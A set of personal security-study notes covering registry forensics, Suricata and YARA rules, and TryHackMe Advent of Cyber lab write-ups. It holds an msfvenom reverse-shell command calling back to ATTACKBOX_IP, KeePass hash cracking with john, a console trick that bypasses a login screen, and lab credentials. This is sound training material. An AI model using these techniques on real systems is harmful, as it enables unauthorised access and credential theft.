|Hive on Disk|Where You See It in Registry Editor| |---|---| |SYSTEM|HKEY_LOCAL_MACHINE\SYSTEM| |SECURITY|HKEY_LOCAL_MACHINE\SECURITY| |SOFTWARE|HKEY_LOCAL_MACHINE\SOFTWARE| |SAM|HKEY_LOCAL_MACHINE\SAM| |NTUSER.DAT|HKEY_USERS\<SID> and HKEY_CURRENT_USER| |USRCLASS.DAT|HKEY_USERS\<SID>\Software\Classes| most of the Registry Hives are located under the HKEY_LOCAL_MACHINE (HKLM) key. The SYSTEM, SOFTWARE, SECURITY, and SAM hives are under the HKLM key. NTUSER.DAT and USRCLASS.DAT are located under HKEY_USERS (HKU) and HKEY_CURRENT_USER (HKCU).

Note: The other two keys (HKEY_CLASSES_ROOT (HKCR) and HKEY_CURRENT_CONFIG (HKCC)) are not part of any separate hive files. They are dynamically populated when Windows is running.

Registry Forensics

Since the registry contains a wide range of data about the Windows system, it plays a crucial role in forensic investigations. Registry forensics is the process of extracting and analyzing evidence from the registry. In Windows digital forensic investigations, investigators analyze registry, event logs, file system data, memory data, and other relevant data to construct the whole incident timeline.

The table below lists some registry keys that are particularly useful during forensic investigations.

|Registry Key|Importance| |---|---| |HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist|It stores information on recently accessed applications launched via the GUI.| |HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths|It stores all the paths and locations typed by the user inside the Explorer address bar.| |HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths|It stores the path of the applications.| |HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery|It stores all the search terms typed by the user in the Explorer search bar.| |HKLM\Software\Microsoft\Windows\CurrentVersion\Run|It stores information on the programs that are set to automatically start (startup programs) when the users logs in.| |HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs|It stores information on the files that the user has recently accessed.| |HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName|It stores the computer's name (hostname).| |HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall|It stores information on the installed programs.|

Numerous other registry keys can be used for extracting important evidence from a Windows system during an incident investigation. The investigation of these registry keys during forensics cannot be done via the built-in Registry Editor tool. It is because the Registry analysis cannot be done on the system under investigation (due to the chance of modification), so we collect the Registry Hives and open them offline into our forensic workstation. However, the Registry Editor does not allow opening offline hives. The Register editor also displays some of the key values in binary which are not readable.

To solve this problem, there are some tools built for registry forensics. In this task you will use the Registry Explorer tool which is a registry forensics tool. It is open source and can parse the binary data out of the registry, and we can analyze it without the fear of modification.

[Vault: Tools] Splunk

Sun, 21 Dec 2025 18:20:43 GMT

Splunk is a platform for collecting, storing, and analysing machine data. It provides various tools for analysing data, including search, correlation, and visualisation. It is a powerful tool that organisations of all sizes can use to improve their IT operations and security posture.

Splunk is a data analysis platform and Splunk Enterprise provides SIEM solutions.
Splunk Enterprise is a self-hosted tool used to retain, analyze, and search an organization's log data to provide security information and alerts in real-time.
Splunk Cloud is a cloud-hosted tool used to collect, search, and monitor log data. Splunk Cloud is helpful for organizations running hybrid or cloud-only environments, where some or all of the organization's services are in the cloud.

[Vault: Writeups / THM / Advent of Cyber 2025] THM AOC25 Sidequest1

Sun, 21 Dec 2025 18:20:43 GMT

Creds mcskidy : AoC2025! eddi_knapp : S0mething1Sc0ming

hint from day 1 : Once you have the final flag, use it to unlock the hidden png. Where is it? That's a .secret!

root@tbfc-web01:/home/mcskidy/Documents$ cat read-me-please.txt

From: mcskidy
To: whoever finds this

I had a short second when no one was watching. I used it.

I've managed to plant a few clues around the account.
If you can get into the user below and look carefully,
those three little "easter eggs" will combine into a passcode
that unlocks a further message that I encrypted in the
/home/eddi_knapp/Documents/ directory.
I didn't want the wrong eyes to see it.

Access the user account:
username: eddi_knapp
password: S0mething1Sc0ming

There are three hidden easter eggs.
They combine to form the passcode to open my encrypted vault.

Clues (one for each egg):

1)
I ride with your session, not with your chest of files.
Open the little bag your shell carries when you arrive.

2)
The tree shows today; the rings remember yesterday.
Read the ledger’s older pages.

3)
When pixels sleep, their tails sometimes whisper plain words.
Listen to the tail.

Find the fragments, join them in order, and use the resulting passcode
to decrypt the message I left. Be careful — I had to be quick,
and I left only enough to get help.

in ~/.bashrc export PASSFRAG1="3ast3r"

in eddi_knapp@tbfc-web01:~/.secret_git$ git log git checkout d12875c8b62e089320880b9b7e41d6765818af3d cat secret_note.txt PASSFRAG2: -1s-

eddi_knapp@tbfc-web01:~$ cat Pictures/.easter_egg ... PASSFRAG3: c0M1nG

Passcode: 3ast3r-1s-c0M1nG

root@tbfc-web01:/home/eddi_knapp/Documents$ gpg --output mcskidy --decrypt mcskidy_note.txt.gpg

root@tbfc-web01:/home/eddi_knapp/Documents$ cat mcskidy

Congrats — you found all fragments and reached this file.

Below is the list that should be live on the site. If you replace the contents of
/home/socmas/2025/wishlist.txt with this exact list (one item per line, no numbering),
the site will recognise it and the takeover glitching will stop. Do it — it will save the site.

Hardware security keys (YubiKey or similar)
Commercial password manager subscriptions (team seats)
Endpoint detection & response (EDR) licenses
Secure remote access appliances (jump boxes)
Cloud workload scanning credits (container/image scanning)
Threat intelligence feed subscription

Secure code review / SAST tool access
Dedicated secure test lab VM pool
Incident response runbook templates and playbooks
Electronic safe drive with encrypted backups

A final note — I don't know exactly where they have me, but there are *lots* of eggs
and I can smell chocolate in the air. Something big is coming.  — McSkidy

---

When the wishlist is corrected, the site will show a block of ciphertext. This ciphertext can be decrypted with the following unlock key:

UNLOCK_KEY: 91J6X7R4FQ9TQPM9JX2Q9X2Z

To decode the ciphertext, use OpenSSL. For instance, if you copied the ciphertext into a file /tmp/website_output.txt you could decode using the following command:

cat > /tmp/website_output.txt
openssl enc -d -aes-256-cbc -pbkdf2 -iter 200000 -salt -base64 -in /tmp/website_output.txt -out /tmp/decoded_message.txt -pass pass:'91J6X7R4FQ9TQPM9JX2Q9X2Z'
cat /tmp/decoded_message.txt

Sorry to be so convoluted, I couldn't risk making this easy while King Malhare watches. — McSkidy

Follow above instructions and visit the webpage to get ciphertext : http://10.48.172.161:8080/

U2FsdGVkX1/7xkS74RBSFMhpR9Pv0PZrzOVsIzd38sUGzGsDJOB9FbybAWod5HMsa+WIr5HDprvK6aFNYuOGoZ60qI7axX5Qnn1E6D+BPknRgktrZTbMqfJ7wnwCExyU8ek1RxohYBehaDyUWxSNAkARJtjVJEAOA1kEOUOah11iaPGKxrKRV0kVQKpEVnuZMbf0gv1ih421QvmGucErFhnuX+xv63drOTkYy15s9BVCUfKmjMLniusI0tqs236zv4LGbgrcOfgir+P+gWHc2TVW4CYszVXlAZUg07JlLLx1jkF85TIMjQ3B91MQS+btaH2WGWFyakmqYltz6jB5DOSCA6AMQYsqLlx53ORLxy3FfJhZTl9iwlrgEZjJZjDoXBBMdlMCOjKUZfTbt3pnlHWEaGJD7NoTgywFsIw5cz7hkmAMxAIkNn/5hGd/S7mwVp9h6GmBUYDsgHWpRxvnjh0s5kVD8TYjLzVnvaNFS4FXrQCiVIcp1ETqicXRjE4T0MYdnFD8h7og3ZlAFixM3nYpUYgKnqi2o2zJg7fEZ8c=

root@tbfc-web01:~$ openssl enc -d -aes-256-cbc -pbkdf2 -iter 200000 -salt -base64 -in website_output.txt -out decoded_message.txt -pass pass:'91J6X7R4FQ9TQPM9JX2Q9X2Z'

root@tbfc-web01:~$ cat decoded_message.txt

Well done — the glitch is fixed. Amazing job going the extra mile and saving the site. Take this flag THM{w3lcome_2_A0c_2025}

NEXT STEP:
If you fancy something a little...spicier....use the FLAG you just obtained as the passphrase to unlock:
/home/eddi_knapp/.secret/dir

That hidden directory has been archived and encrypted with the FLAG.
Inside it you'll find the sidequest key.

root@tbfc-web01:/home/eddi_knapp/.secret$ gpg --output dir.tar.gz --decrypt dir.tar.gz.gpg give passphrase and youl get decrypted dir.tar.gz

root@tbfc-web01:/home/eddi_knapp/.secret$ tar xvzf dir.tar.gz dir/ dir/sq1.png

from local machine:

 scp eddi_knapp@10.48.172.161:~/.secret/dir/sq1.png ~/temp

![[attachments/THM-AOC25-Sidequest1-1765654805659.png]]

secret key to access https://tryhackme.com/room/sq1-aoc2025-FzPnrt2SAu go to http://10.48.145.171:21337/ and enter : now_you_see_me

nmap 10.48.145.171
Starting Nmap 7.92 ( https://nmap.org ) at 2025-12-13 22:48 +03
Nmap scan report for 10.48.145.171
Host is up (0.14s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
8000/tcp  open     http-alt
8080/tcp  open     http-proxy
9001/tcp  open     tor-orport
32769/tcp filtered filenet-rpc

Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds

Also 13400, 13401, 13402, 13403, 13404

access the control panel at http://10.48.145.171:8080/

paste in console

document.getElementById('loginWindow').style.display = 'none';
document.getElementById('mapScreen').style.display = 'block';

Pressing the key on 'Cells/Storage', you get flag1 : THM{h0pp1ing_m4d}

[Vault: Writeups / THM / Advent of Cyber 2025] THM AOC25 Sidequest2

Sun, 21 Dec 2025 18:20:43 GMT

https://tryhackme.com/room/attacks-on-ecrypted-files-aoc2025-asdfghj123

ubuntu@tryhackme:~/Desktop/john/run$ ./keepass2john ~/.Passwords.kdbx > ~/hash.txt
ubuntu@tryhackme:~$ cat hash.txt 
.Passwords:$keepass$*4*20*ef636ddf*67108864*19*2*695a889e93e7279803646b988243060740965d661f0627256bc4da2bdd88da43*06c64226005acd9a116702b3248ae4191572df0293ee31ab4f2f7ccffebc2c68*03d9a29a67fb4bb500000400021000000031c1f2e6bf714350be5805216afc5aff0304000000010000000420000000695a889e93e7279803646b988243060740965d661f0627256bc4da2bdd88da430710000000958513b5c2c36a02c5e822d6b74ccb420b8b00000000014205000000245555494410000000ef636ddf8c29444b91f7a9a403e30a0c05010000004908000000140000000000000005010000004d08000000000000040000000004010000005004000000020000004201000000532000000006c64226005acd9a116702b3248ae4191572df0293ee31ab4f2f7ccffebc2c6804010000005604000000130000000000040000000d0a0d0a*41b1d7deecfba1baa64171a51f88ecc66e97e20056c6fb245ad13e7ff9b37ff1

ubuntu@tryhackme:~$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [AES/Argon2 256/256 AVX2])
Cost 1 (t (rounds)) is 20 for all loaded hashes
Cost 2 (m) is 65536 for all loaded hashes
Cost 3 (p) is 2 for all loaded hashes
Cost 4 (KDF [0=Argon2d 2=Argon2id 3=AES]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Note: Passwords longer than 41 [worst case UTF-8] to 124 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Failed to use huge pages (not pre-allocated via sysctl? that's fine)
harrypotter      (.Passwords)     
1g 0:00:01:05 DONE (2025-12-16 11:12) 0.01517g/s 1.457p/s 1.457c/s 1.457C/s harrypotter..ihateyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed

ubuntu@tryhackme:~$ keepassxc .Passwords.kdbx

Enter the password in keepass application and select key and go to advanced and in attachements there ill be sq2.png

![[attachments/THM-AOC25-Sidequest2-1765883626473.png]]

[Vault: Defence and Response] Signature rules

Fri, 19 Dec 2025 07:57:50 GMT

A signature specifies detection rules. These rules outline the types of network intrusions you want an IDS to detect. For example, a signature can be written to detect and alert on suspicious traffic attempting to connect to a port. Rule language differs depending on different network intrusion detection systems.

NIDS rules consists of three components: an action, a header, and rule options.

Action
- Determines the action to take if the rule criteria matches are met.
- Actions differ across NIDS rule languages, but some common actions are: alert, pass, or reject.
Header
- The header defines the signature's network traffic. These include information such as source and destination IP addresses, source and destination ports, protocols, and traffic direction. If we want to detect an alert on suspicious traffic connecting to a port, we have to first define the source of the suspicious traffic in the header. Suspicious traffic can originate from IP addresses outside the local network. It can also use specific or unusual protocols. We can specify external IP addresses and these protocols in the header. ![[attachments/Signature-rules-1765219231508.png]]
Rule Options
- The rule options lets you customize signatures with additional parameters. There are many different options available to use.
- Typically, rule options are separated by semi-colons and enclosed in parentheses. ![[attachments/Signature-rules-1765219342529.png]]

[[Suricata]] [[YARA]]

[Vault: Tools] Suricata

Fri, 19 Dec 2025 07:57:50 GMT

Suricata is an open-source intrusion detection system, intrusion prevention system, and network analysis tool.. It was developed by the Open Information Security Foundation.

Signature Rules

Rules or signatures are used to identify specific patterns, behavior, and conditions of network traffic that might indicate malicious activity. The terms rule and signature are often used interchangeably in Suricata.

Suricata uses signatures analysis, which is a detection method used to find events of interest. Signatures consist of three components:

Action:

The first component of a signature. It describes the action to take if network or system activity matches the signature. Examples include: alert, pass, drop, or reject.
- The alert keyword instructs to alert on selected network traffic. The IDS will inspect the traffic packets and send out an alert in case it matches.
- Note that the drop action also generates an alert, but it drops the traffic. A drop action only occurs when Suricata runs in IPS mode.
- The pass action allows the traffic to pass through the network interface. The pass rule can be used to override other rules. An exception to a drop rule can be made with a pass rule.
- The reject action does not allow the traffic to pass. Instead, a TCP reset packet will be sent, and Suricata will drop the matching packet. A TCP reset packet tells computers to stop sending messages to each other.

Header:

The header includes network traffic information like source and destination IP addresses, source and destination ports, protocol, and traffic direction.
- The parameters to the protocol http field are $HOME_NET any -> $EXTERNAL_NET any. The arrow indicates the direction of the traffic coming from the $HOME_NET and going to the destination IP address $EXTERNAL_NET.
- $HOME_NET is a Suricata variable defined in /etc/suricata/suricata.yaml that you can use in your rule definitions as a placeholder for your local or home network to identify traffic that connects to or from systems within your organization.

Rule options:

The rule options provide you with different options to customize signatures.
- Configuring rule options helps narrow down network traffic so you can find exactly what you’re looking for.
- rule options are typically enclosed in a pair of parentheses and separated by semicolons.
- - The msg: option provides the alert text. In this case, the alert will print out the text “GET on wire”, which specifies why the alert was triggered.
- The flow:established,to_server option determines that packets from the client to the server should be matched. (In this instance, a server is defined as the device responding to the initial SYN packet with a SYN-ACK packet.)
- The content:"GET" option tells Suricata to look for the word GET in the content of the http.method portion of the packet.
- The sid:12345 (signature ID) option is a unique numerical value that identifies the rule.
- The rev:3 option indicates the signature's revision which is used to identify the signature's version. Here, the revision version is 3.

eg: ![[attachments/Suricata-img-202512191001.png|593x73]]

Access suricata rules

 cd /etc/suricata/rules
 less custom.rules

Suricata's configuration file is suricata.yaml, which uses the YAML file format for syntax and structure.

Suricata log files

There are two log files that Suricata generates when alerts are triggered:

eve.json: The eve.json file is the standard Suricata log file. This file contains detailed information and metadata about the events and alerts generated by Suricata stored in JSON format. For example, events in this file contain a unique identifier called flow_id which is used to correlate related logs or alerts to a single network flow, making it easier to analyze network traffic. The eve.json file is used for more detailed analysis and is considered to be a better file format for log parsing and SIEM log ingestion.
- The eve.json file is generated when Suricate runs, and can be located in the /var/log/suricata directory.
fast.log: The fast.log file is used to record minimal alert information including basic IP address and port details about the network traffic. The fast.log file is used for basic logging and alerting and is considered a legacy file format and is not suitable for incident response or threat hunting tasks.
- The fast.log file can be located in the /var/log/suricata directory after Suricata runs.

The main difference between the eve.json file and the fast.log file is the level of detail that is recorded in each. The fast.log file records basic information, whereas the eve.json file contains additional verbose information.

When you create a new rule, you'll need to test the rule to confirm whether or not it worked as expected. You can use the fast.log file to quickly compare the number of alerts generated each time you run Suricata to test a signature against the sample.pcap file.

Usage

sudo suricata -r sample.pcap -S custom.rules -k none

The -r sample.pcap option specifies an input file to mimic network traffic. In this case, the sample.pcap file.
The -S custom.rules option instructs Suricata to use the rules defined in the custom.rules file.
The -k none option instructs Suricata to disable all checksum checks.

Resources

[Vault: Tools] YARA

Fri, 19 Dec 2025 07:57:50 GMT

YARA is a tool used to identify and classify malware based on patterns in its code. By writing custom rules, analysts can define specific characteristics to look for—such as particular strings, file headers, or behaviours—and YARA will scan files or processes to find matches, making it invaluable for detecting malicious code.

How They Work

Pattern Definition: Analysts identify unique characteristics (strings, code) in a malware sample.
Rule Creation: These characteristics are encoded into a YARA rule file (.yar).
Scanning: The YARA tool scans files, memory, or data streams for these patterns.
Matching: If conditions are met, the rule triggers, flagging the file as malicious or matching a threat family.

When it is used

Post-incident analysis: when the security team needs to verify whether traces of malware found on one compromised host still exist elsewhere in the environment.
Threat Hunting: searching through systems and endpoints for signs of known or related malware families.
Intelligence-based scans: applying shared YARA rules from other defenders or kingdoms to detect new indicators of compromise.
Memory analysis: examining active processes in a memory dump for malicious code fragments.

YARA Rules

YARA rules are signature-based detection patterns, like a programming language, used in cybersecurity to identify and classify malware or malicious files by matching specific text strings, hex patterns, or code fragments within files or memory. They function as "fingerprints" for threats, allowing security analysts to detect known malware, find variants, hunt for threats, and perform forensic analysis by defining conditions (metadata, strings, logic) that trigger a match, making them essential for incident response.

Syntax

rule name{
meta:
strings:
condition:
}

In the strings section, we have defined variables that include the value to look out for: $cmd
In the condition section, we define when the rule will match the scanned file. In this case, if any of the specified strings are present.

Rule Structure

Metadata (meta): Non-functional descriptive information (author, date, description, hash). Used for organization and documentation.
Strings (strings): The variables (identifiers) defining what to search for. The specific text, hex, or regex patterns to search for.
Conditions (condition): The Boolean logic that determines if a file/process matches the rule.

String Types & Modifiers

Strings are prefixed with $ and can be categorized into three types:

Text Strings

Plaintext sequences. Default behavior is ASCII and case-sensitive.

nocase: Ignores capitalization.
wide: Searches for 2-byte Unicode (UTF-16) characters. (Many Windows executables use two-byte Unicode characters.)
ascii: Enforces 1-byte character searching (often used with wide).
xor: Searches for the string encoded with all possible 1-byte XOR keys.
base64 / base64wide: Searches for the Base64 encoded version of the string.

Hexadecimal Strings

Used for raw byte sequences, shellcode, or non-printable signatures. Enclosed in curly braces { }.

Wildcards: ?? represents an unknown byte.
Jumps: [x-y] defines a variable range of bytes between two static sequences.

Regular Expressions (Regex)

Flexible patterns for varying data like URLs or obfuscated commands. Enclosed in forward slashes / /.

Note: Resource-intensive; excessive use can degrade scan performance.

Conditions (Logic)

The condition determines the rule's verdict.

Boolean Operators: and, or, not.
Quantifiers:
- any of them: Triggers if any defined string is found.
- all of them: Triggers only if every defined string is found.
- x of ($s*): Triggers if a specific count of a string set is found.
File Properties:
- filesize: Filter based on file size (e.g., filesize < 10MB).
- uint16(0) == 0x5A4D: Checks for specific headers (e.g., MZ header at the start of a file).

Example:

rule rule1
{
	meta:
        author = "TBFC SOC L2"
        description = "IcedID Rule"
        date = "2025-10-10"
        confidence = "low"
        
    strings:
        $flag_string = "MalString"
		$xmas = "Christmas" nocase
	    $xmaswide = "Christmas" wide ascii
	    $hidden = "Malhare" xor
	    $b64 = "SOC-mas" base64
        $mz = { 4D 5A 90 00 }   // MZ header of a Windows executable
        $hex_string = { E3 41 ?? C8 G? VB }
        $url = /http:\/\/.*malhare.*/ nocase
        $cmd = /powershell.*-enc\s+[A-Za-z0-9+/=]+/ nocase

    condition:
        $flag_string 
        // OR
        any of them
		// OR
	    all of them
		// OR
		($s1 or $s2) and not $benign
		// OR
		any of them and (filesize < 700KB)
}

CLI Usage

Basic execution syntax: yara [options] rule_file.yar target_directory_or_file

|Flag|Function| |---|---| |-r|Recursive: Scans subdirectories.| |-s|Show Strings: Displays the specific string matches that triggered the rule.| |-m|Metadata: Displays metadata for matching rules.|

[Vault: Writeups / THM] Advent of Cyber 2024

Fri, 19 Dec 2025 07:57:50 GMT

url: https://tryhackme.com/room/adventofcyber2024

Day 1 - OPSEC

Concepts Discussed

[[OSINT|OSINT]]

Tools used

file
exiftool
more @ https://tryhackme.com/r/room/opsec

Day 2 - Log Analysis

Tools used

Elastic (SIEM tool)
cyberchef
more @ https://tryhackme.com/r/room/investigatingwithelk101

Day 3 - Log analysis

ELK ELK stands for Elasticsearch, Logstash, and Kibana. These are three open-source tools that are commonly used together to collect, store, analyse, and visualise data.
Kibana is a web-based visualisation tool for exploring data stored in Elasticsearch. It can be used to create interactive dashboards and charts that help users to understand data.
- KQL - Kibana Query Language - an easy-to-use language that can be used to search documents for values.

| Query/Syntax | Description | Example | | ---------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------- | | " " | The two quotation marks are used to search for specific values within the documents. Values in quotation marks are used for exact searches. | "TryHackMe" | | * | The asterisk denotes a wildcard, which searches documents for similar matches to the value provided. | United* (would return United Kingdom and United States) | | OR | This logical operator is used to show documents that contain either of the values provided. | "United Kingdom" OR "England" | | AND | This logical operator is used to show documents that contain both values. | "Ben" AND "25" | | : | This is used to search the (specified) field of a document for a value, such as an IP address. Note that the field you provide here will depend on the fields available in the index pattern. | ip.address: 10.10.10.10 |

Kibana also allows using Lucene query, an advanced language that supports features such as fuzzy terms (searches for terms that are similar to the one provided), regular expressions, etc.
File Upload Vulnerabilities File upload vulnerabilities occur when a website doesn't properly handle the files that users upload. If the site doesn't check what kind of file is being uploaded, how big it is, or what it contains, it opens the door to all sorts of attacks.
RCE: Uploading a script that the server runs gives the attacker control over it.
XSS: Uploading an HTML file that contains an XSS code which will steal a cookie and send it back to the attacker's server.
more @ https://tryhackme.com/jr/advancedelkqueries

Day 4 - Atomic Red Team

Concepts Discussed

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework
- https://attack.mitre.org/
- https://mitre-attack.github.io/attack-navigator/

Tools used

Atomic Red Team
- The Atomic Red Team library is a collection of red team test cases that are mapped to the MITRE ATT&CK framework. The library consists of simple test cases that can be executed by any blue team to test for detection gaps and help close them down. The library also supports automation, where the techniques can be automatically executed. However, it is also possible to execute them manually.
- eg: Invoke-AtomicTest T1566.001 -TestNumbers 1
sysmon
- https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
- Sysmon refers to System Monitor, which is a Windows system service and device driver developed by Microsoft that is designed to monitor and log various events happening within a Windows system.
more @ https://tryhackme.com/r/room/atomicredteam

Day 5 - XXE

Concepts Discussed

XML Extensible Markup Language is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable
- https://www.w3schools.com/xml/xml_whatis.asp
Document Type Definition (DTD)
- A DTD is a set of rules that defines the structure of an XML document. Just like a database scheme, it acts like a blueprint, telling you what elements (tags) and attributes are allowed in the XML file.
- Entities in XML are placeholders that allow the insertion of large chunks of data or referencing internal or external files.
XML External Entity ([[XXE|XXE]])
- XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

Tools used

[[Burpsuite]]
more @ https://tryhackme.com/r/room/xxeinjection

Day 6 - Sandboxes

Concepts Discussed

[[YARA]] YARA is a tool used to identify and classify malware based on patterns in its code. By writing custom rules, analysts can define specific characteristics to look for—such as particular strings, file headers, or behaviours—and YARA will scan files or processes to find matches, making it invaluable for detecting malicious code. syntax
```
rule name{
meta:
strings:
condition:
}
```
- In the strings section, we have defined variables that include the value to look out for: $cmd
- In the condition section, we define when the rule will match the scanned file. In this case, if any of the specified strings are present.
EDR Endpoint detection and response (EDR) is a series of tools that monitor devices for activity that could indicate a threat.

Tools used

FLOSS
- https://github.com/mandiant/flare-floss
- a powerful tool developed by Mandiant that functions similarly to the Linux strings tool but is optimized for malware analysis, making it ideal for revealing any concealed details. It extracts obfuscated strings from malware binaries.
more @ https://tryhackme.com/r/room/flarevmarsenaloftools

Day 7 - AWS Log Analysis

Concepts Discussed

AWS
- Amazon Web Services (AWS) is a comprehensive cloud computing platform offered by Amazon. It provides a wide range of services such as computing power, storage, databases, networking, analytics, and more, delivered over the internet on a pay-as-you-go basis.
- EC2 instances (Amazon Elastic Compute Cloud) - virtualised instances in the cloud
- S3 (Amazon Simple Storage Service) - used for object storage
- IAM (Identity and Access Management service) - a framework/process for controlling and securing digital identities and user access in organisations.

Tools used

AWS Cloudwatch AWS CloudWatch is a monitoring and observability platform that gives us greater insight into our AWS environment by monitoring applications at multiple levels.
AWS CLoudtrail Monitor actions taken by a user, a role (granted to a user giving them certain permissions) or an AWS service and are recorded as events in AWS CloudTrail.
JQ JQ is a lightweight and flexible command line processor that can be used on JSON to help us transform and filter that JSON data into meaningful data we can understand and use to gain security insights.
- JQ takes two inputs: the filter you want to use, followed by the input file.
- https://jqlang.github.io/jq/

Day 8 - Shellcode

Concepts Discussed

Shellcode A piece of code usually used by malicious actors during exploits like buffer overflow attacks to inject commands into a vulnerable system, often leading to executing arbitrary commands or giving attackers control over a compromised machine. Shellcode is typically written in assembly language and delivered through various techniques, depending on the exploited vulnerability.
Reverse Shell A type of connection in which the target (the machine you're trying to hack) initiates a connection back to your attacking machine (in this case, your machine will be the AttackBox).
Windows API

Tools used

msfvenom
- msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKBOX_IP LPORT=1111 -f powershell
powershell
[[Netcat|Netcat]]
more @ https://tryhackme.com/r/room/avevasionshellcode

Day 9 - GRC

Concepts Discussed

GRC
- Governance, Risk, and Compliance
more @ https://tryhackme.com/r/room/seriskmanagement

Day 10 - Phishing

Concepts Discussed

Phishing
Reverse Shell
Macros In computing, a macro refers to a set of programmed instructions designed to automate repetitive tasks. MS Word, among other MS Office products, supports adding macros to documents. In many cases, these macros can be a tremendous time-saving feature. However, in cyber security, these automated programs can be hijacked for malicious purposes.
typosquatting

Tools used

[[Metasploit]]
more @ https://tryhackme.com/module/phishing

Day 11 - Wi-fi Attacks

Concepts Discussed

Wi-fi
WPA/WPA2 cracking Wi-Fi Protected Access (WPA) was created to secure wireless communication. It uses a strong encryption algorithm. However, the security of this protocol is heavily influenced by the length and complexity of the Pre-Shared Key (PSK). While cracking WPA, attackers start by sending de-authentication packets to a legitimate user of the Wi-Fi network. Once the user disconnects, they try to reconnect to the network, and a 4-way handshake with the router takes place during this time. Meanwhile, the attacker turns its adaptor into monitor mode and captures the handshake. After the handshake is captured, the attacker can crack the password by using brute-force or dictionary attacks on the captured handshake file.

Tools used

iw
Aircrack-_ng
- It is a complete suite of tools to assess WiFi network security.
- airodump-ng - used for packet capture, capturing raw 802.11 frames. (here it is used to capture the 4-way handshake)
- aireplay-ng - sends deauthentication packets to either a specific client (targeted attack) or to all clients connected to an access point (broadcast attack).
- aircrack-ng - used to crack the WPA/WP2 passphrase using the captured WPA handshake
more @ https://tryhackme.com/module/networking

Day 12 - Web timing attacks

Concepts Discussed

Web timing attack a web timing attack means we glean information from a web application by reviewing how long it takes to process our request. By making tiny changes in what we send or how we send it and observing the response time, we can access information we are not authorised to have. Timing attacks can often be divided into two main categories:
- Information Disclosures Leveraging the differences in response delays, a threat actor can uncover information they should not have access to. For example, timing differences can be used to enumerate the usernames of an application, making it easier to stage a password-guessing attack and gain access to accounts.
- Race Conditions Race conditions are similar to business logic flaws in that a threat actor can cause the application to perform unintended actions. However, the issue's root cause is how the web application processes requests, making it possible to cause the race condition. For example, if we send the same coupon request several times simultaneously, it might be possible to apply it more than once. Race conditions are a subset of web timing attacks that are even more special. With a race condition attack, we are no longer simply looking to gain access to information but can cause the web application to perform unintended actions on our behalf.

Tools used

burpsuite
more @ https://tryhackme.com/r/room/raceconditionsattacks

Day 13 - WebSockets

Concepts Discussed

Websockets WebSockets let your browser and the server keep a constant line of communication open.
WebSocket Vulnerabilities
- Weak Authentication and Authorisation: Unlike regular HTTP, WebSockets don't have built-in ways to handle user authentication or session validation. If you don't set these controls up properly, attackers could slip in and get access to sensitive data or mess with the connection.
- Message Tampering: WebSockets let data flow back and forth constantly, which means attackers could intercept and change messages if encryption isn't used. This could allow them to inject harmful commands, perform actions they shouldn't, or mess with the sent data.
- Cross-Site WebSocket Hijacking (CSWSH): This happens when an attacker tricks a user's browser into opening a WebSocket connection to another site. If successful, the attacker might be able to hijack that connection or access data meant for the legitimate server.
- Denial of Service (DoS): Because WebSocket connections stay open, they can be targeted by DoS attacks. An attacker could flood the server with a ton of messages, potentially slowing it down or crashing it altogether.

Tools used

Burpsuite
more @ https://tryhackme.com/module/learn-burp-suite

Day 14 - Certificate Mismanagement

Concepts Discussed

Certificate:
- Public key: At its core, a certificate contains a public key, part of a pair of cryptographic keys: a public key and a private key. The public key is made available to anyone and is used to encrypt data.
- Private key: The private key remains secret and is used by the website or server to decrypt the data.
- Metadata: Along with the key, it includes metadata that provides additional information about the certificate holder (the website) and the certificate. You usually find information about the Certificate Authority (CA), subject (information about the website), a uniquely identifiable number, validity period, signature, and hashing algorithm.
Certificate Authority (CA)
- A CA is a trusted entity that issues certificates. eg: GlobalSign, Let’s Encrypt, and DigiCert
- The browser trusts these entities and performs a series of checks to ensure it is a trusted CA.
- Here is a breakdown of what happens with a certificate:
  - Handshake: Your browser requests a secure connection, and the website responds by sending a certificate, but in this case, it only requires the public key and metadata.
  - Verification: Your browser checks the certificate for its validity by checking if it was issued by a trusted CA. If the certificate hasn’t expired or been tampered with, and the CA is trusted, then the browser gives the green light. There are different types of checks you can do; check them here.
  - Key exchange: The browser uses the public key to encrypt a session key, which encrypts all communications between the browser and the website.
  - Decryption: The website (server) uses its private key to decrypt the session key, which is symmetric. Now that both the browser and the website share a secret key (session key), we have established a secure and encrypted communication!
Self-Signed Certificates vs. Trusted CA Certificates The process of acquiring a certificate with a CA is long, you create the certificate, and send it to a CA to sign it for you. If you don’t have tools and automation in place, this process can take weeks. Self-signed certificates are signed by an entity usually the same one that authenticates.
- Browsers generally do not trust self-signed certificates because there is no third-party verification. The browser has no way of knowing if the certificate is authentic or if it’s being used for malicious purposes (like a man-in-the-middle attack).
- Trusted CA certificates, on the other hand, are verified by a CA, which acts as a trusted third party to confirm the website’s identity.
Man-in-the-middle attacks

Tools used

burp suite

Day 15 - Active Directory

Concepts Discussed

Directory Services
- Maps and provide access to network resources within an organisation.
- The Lightweight Directory Access Protocol (LDAP) forms the core of Directory Services. It provides a mechanism for accessing and managing directory data to ensure that searching for and retrieving information about subjects and objects such as users, computers, and groups is quick.
Active Directory
- Active Directory is a directory service developed by Microsoft for Windows domain networks.
- It stores information about network objects such as computers, users, and groups.
